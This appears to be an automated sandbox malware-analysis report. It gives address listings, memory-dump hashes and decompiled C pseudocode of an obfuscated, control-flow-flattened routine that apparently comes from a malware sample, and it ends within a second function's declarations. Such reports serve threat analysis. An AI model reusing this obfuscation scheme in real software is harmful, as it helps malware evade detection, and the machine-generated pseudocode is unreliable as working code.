                                                                                                                                                                                                                    0x00a72793
                                                                                                                                                                                                                    0x00a72799
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72799
                                                                                                                                                                                                                    0x00a7269d
                                                                                                                                                                                                                    0x00a726a3
                                                                                                                                                                                                                    0x00a726d3
                                                                                                                                                                                                                    0x00a726da
                                                                                                                                                                                                                    0x00a726e2
                                                                                                                                                                                                                    0x00a726e9
                                                                                                                                                                                                                    0x00a726f0
                                                                                                                                                                                                                    0x00a726f7
                                                                                                                                                                                                                    0x00a72706
                                                                                                                                                                                                                    0x00a7271d
                                                                                                                                                                                                                    0x00a72724
                                                                                                                                                                                                                    0x00a7272b
                                                                                                                                                                                                                    0x00a72732
                                                                                                                                                                                                                    0x00a7273d
                                                                                                                                                                                                                    0x00a72744
                                                                                                                                                                                                                    0x00a72748
                                                                                                                                                                                                                    0x00a7274a
                                                                                                                                                                                                                    0x00a7274d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a726a5
                                                                                                                                                                                                                    0x00a726ab
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a726b1
                                                                                                                                                                                                                    0x00a726bf
                                                                                                                                                                                                                    0x00a726c5
                                                                                                                                                                                                                    0x00a726ab
                                                                                                                                                                                                                    0x00a726a3
                                                                                                                                                                                                                    0x00a72697
                                                                                                                                                                                                                    0x00a7268b
                                                                                                                                                                                                                    0x00a72683
                                                                                                                                                                                                                    0x00a726c9
                                                                                                                                                                                                                    0x00a726d2
                                                                                                                                                                                                                    0x00a726d2
                                                                                                                                                                                                                    0x00a72848
                                                                                                                                                                                                                    0x00a7284f
                                                                                                                                                                                                                    0x00a72854
                                                                                                                                                                                                                    0x00a7285b
                                                                                                                                                                                                                    0x00a7285b
                                                                                                                                                                                                                    0x00a7285b
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: (A $@K&$ew$hx(
                                                                                                                                                                                                                    • API String ID: 0-1063434877
                                                                                                                                                                                                                    • Opcode ID: f098e6185fc180e7abb39e1380ecc8534ec30a1d7c2815a2c42142b2ee6645f9
                                                                                                                                                                                                                    • Instruction ID: dd8f90dcd82b7c203acd77ee361185c070ccd1221068d89dc9eb7b009ad50740
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f098e6185fc180e7abb39e1380ecc8534ec30a1d7c2815a2c42142b2ee6645f9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4D11FB15083809FD368CF65C88A65BFBF1FBC4758F108A1DF29A86260D7B18959CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                                                                    			E00A64871() {
                                                                                                                                                                                                                    				signed int _t256;
                                                                                                                                                                                                                    				signed char _t264;
                                                                                                                                                                                                                    				signed int _t272;
                                                                                                                                                                                                                    				intOrPtr _t273;
                                                                                                                                                                                                                    				signed int _t280;
                                                                                                                                                                                                                    				signed int _t281;
                                                                                                                                                                                                                    				signed int _t282;
                                                                                                                                                                                                                    				signed char _t289;
                                                                                                                                                                                                                    				signed int _t305;
                                                                                                                                                                                                                    				signed int _t318;
                                                                                                                                                                                                                    				signed int _t321;
                                                                                                                                                                                                                    				signed int _t322;
                                                                                                                                                                                                                    				signed int _t323;
                                                                                                                                                                                                                    				signed int _t324;
                                                                                                                                                                                                                    				signed int _t325;
                                                                                                                                                                                                                    				signed int _t329;
                                                                                                                                                                                                                    				void* _t331;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				 *(_t331 + 0x74) =  *(_t331 + 0x74) & 0x00000000;
                                                                                                                                                                                                                    				 *(_t331 + 0x78) =  *(_t331 + 0x78) & 0x00000000;
                                                                                                                                                                                                                    				_t281 = 0x1f47816;
                                                                                                                                                                                                                    				 *(_t331 + 0x70) = 0x8653cb;
                                                                                                                                                                                                                    				 *(_t331 + 8) = 0x2a8303;
                                                                                                                                                                                                                    				 *(_t331 + 8) =  *(_t331 + 8) | 0x842b60a0;
                                                                                                                                                                                                                    				 *(_t331 + 8) =  *(_t331 + 8) >> 0x10;
                                                                                                                                                                                                                    				 *(_t331 + 0x18) =  *(_t331 + 8) * 6;
                                                                                                                                                                                                                    				 *(_t331 + 0x18) =  *(_t331 + 0x18) ^ 0x00079197;
                                                                                                                                                                                                                    				 *(_t331 + 0x4c) = 0x262556;
                                                                                                                                                                                                                    				 *(_t331 + 0x4c) =  *(_t331 + 0x4c) | 0xf96cc8df;
                                                                                                                                                                                                                    				 *(_t331 + 0x4c) =  *(_t331 + 0x4c) ^ 0xf960163b;
                                                                                                                                                                                                                    				 *(_t331 + 0x14) = 0x333b8e;
                                                                                                                                                                                                                    				 *(_t331 + 0x14) =  *(_t331 + 0x14) | 0xca24e189;
                                                                                                                                                                                                                    				_t321 = 0x48;
                                                                                                                                                                                                                    				 *(_t331 + 0x18) =  *(_t331 + 0x14) / _t321;
                                                                                                                                                                                                                    				_t322 = 0x14;
                                                                                                                                                                                                                    				 *(_t331 + 0x18) =  *(_t331 + 0x18) * 0x45;
                                                                                                                                                                                                                    				 *(_t331 + 0x18) =  *(_t331 + 0x18) ^ 0xc1c4d87c;
                                                                                                                                                                                                                    				 *(_t331 + 0x3c) = 0x20fdb9;
                                                                                                                                                                                                                    				 *(_t331 + 0x3c) =  *(_t331 + 0x3c) >> 5;
                                                                                                                                                                                                                    				 *(_t331 + 0x3c) =  *(_t331 + 0x3c) << 5;
                                                                                                                                                                                                                    				 *(_t331 + 0x3c) =  *(_t331 + 0x3c) ^ 0x0029d761;
                                                                                                                                                                                                                    				 *(_t331 + 0x38) = 0x6dc8ef;
                                                                                                                                                                                                                    				 *(_t331 + 0x38) =  *(_t331 + 0x38) | 0xf4d1a5fc;
                                                                                                                                                                                                                    				 *(_t331 + 0x38) =  *(_t331 + 0x38) << 4;
                                                                                                                                                                                                                    				 *(_t331 + 0x38) =  *(_t331 + 0x38) ^ 0x4fd488b4;
                                                                                                                                                                                                                    				 *(_t331 + 0x24) = 0x230b0;
                                                                                                                                                                                                                    				 *(_t331 + 0x24) =  *(_t331 + 0x24) ^ 0x76f4ec34;
                                                                                                                                                                                                                    				 *(_t331 + 0x24) =  *(_t331 + 0x24) >> 9;
                                                                                                                                                                                                                    				 *(_t331 + 0x24) =  *(_t331 + 0x24) << 9;
                                                                                                                                                                                                                    				 *(_t331 + 0x24) =  *(_t331 + 0x24) ^ 0x76fa6001;
                                                                                                                                                                                                                    				 *(_t331 + 0x58) = 0x3e4d92;
                                                                                                                                                                                                                    				 *(_t331 + 0x58) =  *(_t331 + 0x58) << 7;
                                                                                                                                                                                                                    				 *(_t331 + 0x58) =  *(_t331 + 0x58) ^ 0x1f26d100;
                                                                                                                                                                                                                    				 *(_t331 + 0x20) = 0xf02ed1;
                                                                                                                                                                                                                    				 *(_t331 + 0x20) =  *(_t331 + 0x20) + 0xffff6b40;
                                                                                                                                                                                                                    				 *(_t331 + 0x20) =  *(_t331 + 0x20) << 0xb;
                                                                                                                                                                                                                    				 *(_t331 + 0x20) =  *(_t331 + 0x20) * 0x75;
                                                                                                                                                                                                                    				 *(_t331 + 0x20) =  *(_t331 + 0x20) ^ 0x0b4c50d4;
                                                                                                                                                                                                                    				 *(_t331 + 0x54) = 0xe2af84;
                                                                                                                                                                                                                    				 *(_t331 + 0x54) =  *(_t331 + 0x54) << 7;
                                                                                                                                                                                                                    				 *(_t331 + 0x54) =  *(_t331 + 0x54) ^ 0x7158a84b;
                                                                                                                                                                                                                    				 *(_t331 + 0x2c) = 0x643e88;
                                                                                                                                                                                                                    				 *(_t331 + 0x2c) =  *(_t331 + 0x2c) + 0x415d;
                                                                                                                                                                                                                    				 *(_t331 + 0x2c) =  *(_t331 + 0x2c) / _t322;
                                                                                                                                                                                                                    				 *(_t331 + 0x2c) =  *(_t331 + 0x2c) << 7;
                                                                                                                                                                                                                    				 *(_t331 + 0x2c) =  *(_t331 + 0x2c) ^ 0x028b9066;
                                                                                                                                                                                                                    				 *(_t331 + 0x48) = 0xe0425d;
                                                                                                                                                                                                                    				 *(_t331 + 0x48) =  *(_t331 + 0x48) << 2;
                                                                                                                                                                                                                    				_t323 = 0x39;
                                                                                                                                                                                                                    				 *(_t331 + 0x48) =  *(_t331 + 0x48) / _t323;
                                                                                                                                                                                                                    				 *(_t331 + 0x48) =  *(_t331 + 0x48) ^ 0x0001b33b;
                                                                                                                                                                                                                    				 *(_t331 + 0x28) = 0xfa76af;
                                                                                                                                                                                                                    				_t324 = 0x50;
                                                                                                                                                                                                                    				 *(_t331 + 0x24) =  *(_t331 + 0x28) * 0x2b;
                                                                                                                                                                                                                    				 *(_t331 + 0x24) =  *(_t331 + 0x24) / _t324;
                                                                                                                                                                                                                    				 *(_t331 + 0x24) =  *(_t331 + 0x24) >> 0xb;
                                                                                                                                                                                                                    				 *(_t331 + 0x24) =  *(_t331 + 0x24) ^ 0x00033e94;
                                                                                                                                                                                                                    				 *(_t331 + 0x5c) = 0xaa130;
                                                                                                                                                                                                                    				 *(_t331 + 0x5c) =  *(_t331 + 0x5c) + 0xdd66;
                                                                                                                                                                                                                    				 *(_t331 + 0x5c) =  *(_t331 + 0x5c) ^ 0x0004286e;
                                                                                                                                                                                                                    				 *(_t331 + 0x40) = 0x2d0d61;
                                                                                                                                                                                                                    				_t325 = 0x41;
                                                                                                                                                                                                                    				_t318 =  *(_t331 + 0x7c);
                                                                                                                                                                                                                    				_t329 =  *(_t331 + 0x7c);
                                                                                                                                                                                                                    				 *(_t331 + 0x40) =  *(_t331 + 0x40) * 3;
                                                                                                                                                                                                                    				 *(_t331 + 0x40) =  *(_t331 + 0x40) ^ 0x1e2b66a6;
                                                                                                                                                                                                                    				 *(_t331 + 0x40) =  *(_t331 + 0x40) ^ 0x1ea8c382;
                                                                                                                                                                                                                    				 *(_t331 + 0x3c) = 0x4d5a1;
                                                                                                                                                                                                                    				 *(_t331 + 0x3c) =  *(_t331 + 0x3c) + 0xffff0228;
                                                                                                                                                                                                                    				 *(_t331 + 0x3c) =  *(_t331 + 0x3c) * 0xb;
                                                                                                                                                                                                                    				 *(_t331 + 0x3c) =  *(_t331 + 0x3c) ^ 0x0023067f;
                                                                                                                                                                                                                    				 *(_t331 + 0x58) = 0xd12f2e;
                                                                                                                                                                                                                    				 *(_t331 + 0x58) =  *(_t331 + 0x58) << 9;
                                                                                                                                                                                                                    				 *(_t331 + 0x58) =  *(_t331 + 0x58) ^ 0xa25c54a8;
                                                                                                                                                                                                                    				 *(_t331 + 0x64) = 0x8e9334;
                                                                                                                                                                                                                    				 *(_t331 + 0x64) =  *(_t331 + 0x64) >> 4;
                                                                                                                                                                                                                    				 *(_t331 + 0x64) =  *(_t331 + 0x64) ^ 0x000bea91;
                                                                                                                                                                                                                    				 *(_t331 + 0x48) = 0x31f5;
                                                                                                                                                                                                                    				 *(_t331 + 0x48) =  *(_t331 + 0x48) >> 6;
                                                                                                                                                                                                                    				 *(_t331 + 0x48) =  *(_t331 + 0x48) / _t325;
                                                                                                                                                                                                                    				 *(_t331 + 0x48) =  *(_t331 + 0x48) ^ 0x0003991a;
                                                                                                                                                                                                                    				 *(_t331 + 0x60) = 0xfadca4;
                                                                                                                                                                                                                    				 *(_t331 + 0x60) =  *(_t331 + 0x60) >> 0x10;
                                                                                                                                                                                                                    				 *(_t331 + 0x60) =  *(_t331 + 0x60) ^ 0x000be571;
                                                                                                                                                                                                                    				 *(_t331 + 0x70) = 0x150aa6;
                                                                                                                                                                                                                    				 *(_t331 + 0x70) =  *(_t331 + 0x70) + 0xaee7;
                                                                                                                                                                                                                    				 *(_t331 + 0x70) =  *(_t331 + 0x70) ^ 0x00159004;
                                                                                                                                                                                                                    				 *(_t331 + 0x30) = 0xfd9f71;
                                                                                                                                                                                                                    				 *(_t331 + 0x30) =  *(_t331 + 0x30) * 0x5f;
                                                                                                                                                                                                                    				 *(_t331 + 0x30) =  *(_t331 + 0x30) + 0xffff6784;
                                                                                                                                                                                                                    				 *(_t331 + 0x30) =  *(_t331 + 0x30) + 0xc188;
                                                                                                                                                                                                                    				 *(_t331 + 0x30) =  *(_t331 + 0x30) ^ 0x5e1a91c6;
                                                                                                                                                                                                                    				 *(_t331 + 0x2c) = 0x143842;
                                                                                                                                                                                                                    				 *(_t331 + 0x2c) =  *(_t331 + 0x2c) + 0x484a;
                                                                                                                                                                                                                    				 *(_t331 + 0x2c) =  *(_t331 + 0x2c) | 0xfa5b3b57;
                                                                                                                                                                                                                    				 *(_t331 + 0x2c) =  *(_t331 + 0x2c) + 0xffff8a85;
                                                                                                                                                                                                                    				 *(_t331 + 0x2c) =  *(_t331 + 0x2c) ^ 0xfa5822cc;
                                                                                                                                                                                                                    				 *(_t331 + 0x6c) = 0xcdf13f;
                                                                                                                                                                                                                    				 *(_t331 + 0x6c) =  *(_t331 + 0x6c) << 1;
                                                                                                                                                                                                                    				 *(_t331 + 0x6c) =  *(_t331 + 0x6c) ^ 0x0190898f;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                    						_t256 =  *(_t331 + 0x74);
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                                    							while(_t281 != 0x1f47816) {
                                                                                                                                                                                                                    								if(_t281 == 0x785f280) {
                                                                                                                                                                                                                    									_push( *((intOrPtr*)(_t331 + 0x50)));
                                                                                                                                                                                                                    									_push( *(_t331 + 0x20));
                                                                                                                                                                                                                    									_push( *(_t331 + 0x5c));
                                                                                                                                                                                                                    									 *((char*)(_t331 + 0x1e)) =  *((intOrPtr*)(_t318 + 1));
                                                                                                                                                                                                                    									 *((char*)(_t331 + 0x1f)) =  *((intOrPtr*)(_t318 + 2));
                                                                                                                                                                                                                    									E00A7DCF9( *(_t331 + 0x60), __eflags, E00A81E60(0xa61774,  *(_t331 + 0x2c), __eflags),  *(_t331 + 0x78),  *(_t331 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t331 + 0x50)),  *((intOrPtr*)(_t331 + 0x84)),  *(_t318 + 3) & 0x000000ff, 0x10,  *(_t318 + 3) & 0x000000ff, _t329 + 0x10,  *(_t331 + 0x54),  *(_t331 + 0x4c),  *(_t331 + 0x64));
                                                                                                                                                                                                                    									E00A7D6DF( *((intOrPtr*)(_t331 + 0xa8)), _t259,  *((intOrPtr*)(_t331 + 0x88)),  *((intOrPtr*)(_t331 + 0x9c)));
                                                                                                                                                                                                                    									_t331 = _t331 + 0x44;
                                                                                                                                                                                                                    									 *(_t329 + 0x38) = ( *(_t318 + 4) & 0x000000ff) << 0x00000008 |  *(_t318 + 5) & 0x000000ff;
                                                                                                                                                                                                                    									_t264 =  *((intOrPtr*)(_t318 + 6));
                                                                                                                                                                                                                    									_t289 =  *((intOrPtr*)(_t318 + 7));
                                                                                                                                                                                                                    									_t318 = _t318 + 8;
                                                                                                                                                                                                                    									_t281 = 0xcce284c;
                                                                                                                                                                                                                    									 *(_t329 + 8) = (_t264 & 0x000000ff) << 0x00000008 | _t289 & 0x000000ff;
                                                                                                                                                                                                                    									goto L1;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t281 == 0xa779afa) {
                                                                                                                                                                                                                    										_t329 = E00A7C6D9(0x40);
                                                                                                                                                                                                                    										__eflags = _t329;
                                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                                    											_t281 = 0x785f280;
                                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                                    												L1:
                                                                                                                                                                                                                    												goto L2;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t281 == 0xa815564) {
                                                                                                                                                                                                                    											__eflags = _t318 - _t256;
                                                                                                                                                                                                                    											asm("sbb ecx, ecx");
                                                                                                                                                                                                                    											_t281 = (_t281 & 0xfd4815ac) + 0xd2f854e;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t281 == 0xb1fa482) {
                                                                                                                                                                                                                    												_t272 = E00A7A586( *(_t331 + 0x24), __eflags,  *(_t331 + 0x54),  *(_t331 + 0x18), 0xa83000);
                                                                                                                                                                                                                    												_t305 =  *(_t331 + 0x74);
                                                                                                                                                                                                                    												_t280 = _t272;
                                                                                                                                                                                                                    												_t273 =  *((intOrPtr*)(_t331 + 0x84));
                                                                                                                                                                                                                    												_t331 = _t331 + 0xc;
                                                                                                                                                                                                                    												_t256 = _t273 + _t280;
                                                                                                                                                                                                                    												 *(_t331 + 0x7c) = _t280;
                                                                                                                                                                                                                    												_t318 = _t280;
                                                                                                                                                                                                                    												 *(_t331 + 0x74) = _t256;
                                                                                                                                                                                                                    												_t281 = 0xa779afa;
                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												if(_t281 == 0xcce284c) {
                                                                                                                                                                                                                    													_t281 = 0xa815564;
                                                                                                                                                                                                                    													 *_t305 = _t329;
                                                                                                                                                                                                                    													_t305 = _t329;
                                                                                                                                                                                                                    													 *(_t331 + 0x68) = _t305;
                                                                                                                                                                                                                    													 *((intOrPtr*)( *0xa83b3c + 8)) =  *((intOrPtr*)( *0xa83b3c + 8)) + 1;
                                                                                                                                                                                                                    													L2:
                                                                                                                                                                                                                    													_t256 =  *(_t331 + 0x74);
                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    													if(_t281 != 0xd2f854e) {
                                                                                                                                                                                                                    														goto L19;
                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                    														E00A76A6B( *((intOrPtr*)(_t331 + 0x80)),  *(_t331 + 0x7c),  *(_t331 + 0x38),  *(_t331 + 0x30),  *(_t331 + 0x6c));
                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                                    								_t282 =  *0xa83b3c;
                                                                                                                                                                                                                    								 *(_t282 + 4) =  *(_t282 + 4) & 0x00000000;
                                                                                                                                                                                                                    								 *((intOrPtr*)(_t282 + 0xc)) =  *_t282;
                                                                                                                                                                                                                    								return 1;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t305 =  *0xa83b3c;
                                                                                                                                                                                                                    							_t281 = 0xb1fa482;
                                                                                                                                                                                                                    							 *(_t331 + 0x68) = _t305;
                                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                                    							__eflags = _t281 - 0x4ea877e;
                                                                                                                                                                                                                    						} while (__eflags != 0);
                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                    0x00a64874
                                                                                                                                                                                                                    0x00a6487b
                                                                                                                                                                                                                    0x00a64880
                                                                                                                                                                                                                    0x00a64885
                                                                                                                                                                                                                    0x00a6488d
                                                                                                                                                                                                                    0x00a64895
                                                                                                                                                                                                                    0x00a6489d
                                                                                                                                                                                                                    0x00a648ab
                                                                                                                                                                                                                    0x00a648af
                                                                                                                                                                                                                    0x00a648b7
                                                                                                                                                                                                                    0x00a648bf
                                                                                                                                                                                                                    0x00a648c7
                                                                                                                                                                                                                    0x00a648cf
                                                                                                                                                                                                                    0x00a648d7
                                                                                                                                                                                                                    0x00a648e5
                                                                                                                                                                                                                    0x00a648ea
                                                                                                                                                                                                                    0x00a648f5
                                                                                                                                                                                                                    0x00a648f8
                                                                                                                                                                                                                    0x00a648fc
                                                                                                                                                                                                                    0x00a64904
                                                                                                                                                                                                                    0x00a6490c
                                                                                                                                                                                                                    0x00a64911
                                                                                                                                                                                                                    0x00a64916
                                                                                                                                                                                                                    0x00a6491e
                                                                                                                                                                                                                    0x00a64926
                                                                                                                                                                                                                    0x00a6492e
                                                                                                                                                                                                                    0x00a64933
                                                                                                                                                                                                                    0x00a6493b
                                                                                                                                                                                                                    0x00a64943
                                                                                                                                                                                                                    0x00a6494b
                                                                                                                                                                                                                    0x00a64950
                                                                                                                                                                                                                    0x00a64955
                                                                                                                                                                                                                    0x00a6495d
                                                                                                                                                                                                                    0x00a64965
                                                                                                                                                                                                                    0x00a6496a
                                                                                                                                                                                                                    0x00a64972
                                                                                                                                                                                                                    0x00a6497a
                                                                                                                                                                                                                    0x00a64982
                                                                                                                                                                                                                    0x00a6498c
                                                                                                                                                                                                                    0x00a64990
                                                                                                                                                                                                                    0x00a64998
                                                                                                                                                                                                                    0x00a649a0
                                                                                                                                                                                                                    0x00a649a5
                                                                                                                                                                                                                    0x00a649ad
                                                                                                                                                                                                                    0x00a649b5
                                                                                                                                                                                                                    0x00a649c5
                                                                                                                                                                                                                    0x00a649c9
                                                                                                                                                                                                                    0x00a649ce
                                                                                                                                                                                                                    0x00a649d6
                                                                                                                                                                                                                    0x00a649de
                                                                                                                                                                                                                    0x00a649e7
                                                                                                                                                                                                                    0x00a649ec
                                                                                                                                                                                                                    0x00a649f2
                                                                                                                                                                                                                    0x00a649fa
                                                                                                                                                                                                                    0x00a64a07
                                                                                                                                                                                                                    0x00a64a08
                                                                                                                                                                                                                    0x00a64a12
                                                                                                                                                                                                                    0x00a64a16
                                                                                                                                                                                                                    0x00a64a1d
                                                                                                                                                                                                                    0x00a64a25
                                                                                                                                                                                                                    0x00a64a2d
                                                                                                                                                                                                                    0x00a64a35
                                                                                                                                                                                                                    0x00a64a3d
                                                                                                                                                                                                                    0x00a64a4c
                                                                                                                                                                                                                    0x00a64a4d
                                                                                                                                                                                                                    0x00a64a51
                                                                                                                                                                                                                    0x00a64a55
                                                                                                                                                                                                                    0x00a64a59
                                                                                                                                                                                                                    0x00a64a61
                                                                                                                                                                                                                    0x00a64a69
                                                                                                                                                                                                                    0x00a64a71
                                                                                                                                                                                                                    0x00a64a7e
                                                                                                                                                                                                                    0x00a64a82
                                                                                                                                                                                                                    0x00a64a8a
                                                                                                                                                                                                                    0x00a64a92
                                                                                                                                                                                                                    0x00a64a97
                                                                                                                                                                                                                    0x00a64a9f
                                                                                                                                                                                                                    0x00a64aa7
                                                                                                                                                                                                                    0x00a64aac
                                                                                                                                                                                                                    0x00a64ab4
                                                                                                                                                                                                                    0x00a64abc
                                                                                                                                                                                                                    0x00a64ac7
                                                                                                                                                                                                                    0x00a64acb
                                                                                                                                                                                                                    0x00a64ad3
                                                                                                                                                                                                                    0x00a64adb
                                                                                                                                                                                                                    0x00a64ae0
                                                                                                                                                                                                                    0x00a64ae8
                                                                                                                                                                                                                    0x00a64af0
                                                                                                                                                                                                                    0x00a64af8
                                                                                                                                                                                                                    0x00a64b00
                                                                                                                                                                                                                    0x00a64b0d
                                                                                                                                                                                                                    0x00a64b11
                                                                                                                                                                                                                    0x00a64b19
                                                                                                                                                                                                                    0x00a64b21
                                                                                                                                                                                                                    0x00a64b29
                                                                                                                                                                                                                    0x00a64b31
                                                                                                                                                                                                                    0x00a64b39
                                                                                                                                                                                                                    0x00a64b41
                                                                                                                                                                                                                    0x00a64b49
                                                                                                                                                                                                                    0x00a64b51
                                                                                                                                                                                                                    0x00a64b59
                                                                                                                                                                                                                    0x00a64b5d
                                                                                                                                                                                                                    0x00a64b65
                                                                                                                                                                                                                    0x00a64b65
                                                                                                                                                                                                                    0x00a64b69
                                                                                                                                                                                                                    0x00a64b69
                                                                                                                                                                                                                    0x00a64b69
                                                                                                                                                                                                                    0x00a64b6d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64b6d
                                                                                                                                                                                                                    0x00a64b7f
                                                                                                                                                                                                                    0x00a64c88
                                                                                                                                                                                                                    0x00a64c94
                                                                                                                                                                                                                    0x00a64c9a
                                                                                                                                                                                                                    0x00a64ca5
                                                                                                                                                                                                                    0x00a64cac
                                                                                                                                                                                                                    0x00a64cf0
                                                                                                                                                                                                                    0x00a64d0c
                                                                                                                                                                                                                    0x00a64d15
                                                                                                                                                                                                                    0x00a64d23
                                                                                                                                                                                                                    0x00a64d27
                                                                                                                                                                                                                    0x00a64d2a
                                                                                                                                                                                                                    0x00a64d2d
                                                                                                                                                                                                                    0x00a64d36
                                                                                                                                                                                                                    0x00a64d42
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64b85
                                                                                                                                                                                                                    0x00a64b8b
                                                                                                                                                                                                                    0x00a64c73
                                                                                                                                                                                                                    0x00a64c76
                                                                                                                                                                                                                    0x00a64c78
                                                                                                                                                                                                                    0x00a64c7e
                                                                                                                                                                                                                    0x00a64b65
                                                                                                                                                                                                                    0x00a64b65
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64b65
                                                                                                                                                                                                                    0x00a64b65
                                                                                                                                                                                                                    0x00a64b91
                                                                                                                                                                                                                    0x00a64b97
                                                                                                                                                                                                                    0x00a64c4f
                                                                                                                                                                                                                    0x00a64c51
                                                                                                                                                                                                                    0x00a64c59
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64b9d
                                                                                                                                                                                                                    0x00a64ba3
                                                                                                                                                                                                                    0x00a64c24
                                                                                                                                                                                                                    0x00a64c29
                                                                                                                                                                                                                    0x00a64c2d
                                                                                                                                                                                                                    0x00a64c2f
                                                                                                                                                                                                                    0x00a64c36
                                                                                                                                                                                                                    0x00a64c39
                                                                                                                                                                                                                    0x00a64c3b
                                                                                                                                                                                                                    0x00a64c3f
                                                                                                                                                                                                                    0x00a64c41
                                                                                                                                                                                                                    0x00a64c45
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64ba5
                                                                                                                                                                                                                    0x00a64bab
                                                                                                                                                                                                                    0x00a64bf7
                                                                                                                                                                                                                    0x00a64bfc
                                                                                                                                                                                                                    0x00a64bfe
                                                                                                                                                                                                                    0x00a64c00
                                                                                                                                                                                                                    0x00a64c04
                                                                                                                                                                                                                    0x00a64b69
                                                                                                                                                                                                                    0x00a64b69
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64bad
                                                                                                                                                                                                                    0x00a64bb3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64bb9
                                                                                                                                                                                                                    0x00a64bd0
                                                                                                                                                                                                                    0x00a64bd5
                                                                                                                                                                                                                    0x00a64bb3
                                                                                                                                                                                                                    0x00a64bab
                                                                                                                                                                                                                    0x00a64ba3
                                                                                                                                                                                                                    0x00a64b97
                                                                                                                                                                                                                    0x00a64b8b
                                                                                                                                                                                                                    0x00a64bd8
                                                                                                                                                                                                                    0x00a64bd8
                                                                                                                                                                                                                    0x00a64be3
                                                                                                                                                                                                                    0x00a64be7
                                                                                                                                                                                                                    0x00a64bf1
                                                                                                                                                                                                                    0x00a64bf1
                                                                                                                                                                                                                    0x00a64d4b
                                                                                                                                                                                                                    0x00a64d51
                                                                                                                                                                                                                    0x00a64d56
                                                                                                                                                                                                                    0x00a64d5a
                                                                                                                                                                                                                    0x00a64d5a
                                                                                                                                                                                                                    0x00a64d5a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a64d66
                                                                                                                                                                                                                    0x00a64b69

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: JH$V%&$]B$a-
                                                                                                                                                                                                                    • API String ID: 0-1847363276
                                                                                                                                                                                                                    • Opcode ID: c9b50b7b696d6aa3b4a628c5af08d750cda43f82910342d6b15bb92d2e8612d0
                                                                                                                                                                                                                    • Instruction ID: 8985e7e7bad29a710efa329e5dec26602da0325823dbba813303eeaf6d038b34
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9b50b7b696d6aa3b4a628c5af08d750cda43f82910342d6b15bb92d2e8612d0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20D12FB10083809FC358CF25C58955BFBF1FB89748F608A1DF6AA96260D7B5C949CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                    			E00A75198(signed int __ecx) {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				char _v1040;
                                                                                                                                                                                                                    				char _v1560;
                                                                                                                                                                                                                    				short _v1564;
                                                                                                                                                                                                                    				short _v1568;
                                                                                                                                                                                                                    				intOrPtr _v1572;
                                                                                                                                                                                                                    				unsigned int _v1576;
                                                                                                                                                                                                                    				signed int _v1580;
                                                                                                                                                                                                                    				signed int _v1584;
                                                                                                                                                                                                                    				signed int _v1588;
                                                                                                                                                                                                                    				signed int _v1592;
                                                                                                                                                                                                                    				signed int _v1596;
                                                                                                                                                                                                                    				signed int _v1600;
                                                                                                                                                                                                                    				signed int _v1604;
                                                                                                                                                                                                                    				signed int _v1608;
                                                                                                                                                                                                                    				signed int _v1612;
                                                                                                                                                                                                                    				signed int _v1616;
